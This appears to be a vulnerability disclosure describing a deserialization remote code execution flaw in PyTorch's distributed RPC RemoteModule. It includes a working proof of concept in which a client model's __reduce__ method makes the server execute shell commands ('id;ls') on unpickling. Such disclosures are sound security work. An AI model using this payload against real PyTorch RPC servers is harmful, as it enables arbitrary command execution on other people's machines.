**Distributed RPC Framework**
=============================
`RemoteModule` **has Deserialization RCE in [pytorch/pytorch](https://github.com/pytorch/pytorch)**
**Description**
===============
credit:HRP Aftersnow gxh
**Distributed RPC Framework** `RemoteModule` **has Deserialization RCE in [pytorch/pytorch](https://github.com/pytorch/pytorch)**
**Proof of Concept**
====================
init environment
export MASTER_ADDR=127.0.0.1
export MASTER_PORT=5000
export TP_SOCKET_IFNAME=ens18
export GLOO_SOCKET_IFNAME=ens18
the server code
[ser.py](http://ser.py/)
import torch
import torch.distributed.rpc as rpc
def run_server():
# Initialize server-side RPC
rpc.init_rpc("server", rank=0, world_size=2)
# Wait for the client's remote call
rpc.shutdown()
if __name__ == "__main__":
run_server()
exec this to run
torchrun --nproc_per_node=1 --nnodes=2 --node_rank=0 --master_addr=127.0.0.1 --master_port=5000 ser.py
**POC**
=======
the client code and is exp
[cli.py](http://cli.py/)
import torch
import torch.distributed.rpc as rpc
from torch.distributed.nn.api.remote_module import RemoteModule
import torch.nn as nn
# Define a simple neural network model MyModel
class MyModel(nn.Module):
def __init__(self):
super(MyModel, self).__init__()
# A simple linear layer with input dimension 2 and output dimension 2
self.fc = nn.Linear(2, 2)
# Define the forward method
def __reduce__(self):
return (__import__('os').system, ("id;ls",))
def run_client():
# Initialize client-side RPC
rpc.init_rpc("client", rank=1, world_size=2)
# Create a remote module to run the model on the server side
remote_model = RemoteModule(
"server", # Server-side device
MyModel(), # Definition of the remote module's model
args=() # Model initialization parameters
)
# Remotely call the model with an input tensor
input_tensor = torch.tensor([1.0, 2.0])
output = remote_model(input_tensor)
print("Output from remote model:", output)
# Shutdown RPC
rpc.shutdown()
if __name__ == "__main__":
run_client()
exec this to run
torchrun --nproc_per_node=1 --nnodes=2 --node_rank=1 --master_addr=127.0.0.1 --master_port=5000 cli.py
now we can see the output in server
![](https://images.seebug.org/1730365082950-w331s)
**Impact**
==========
Remote execution of arbitrary commands through deserialization
暂无评论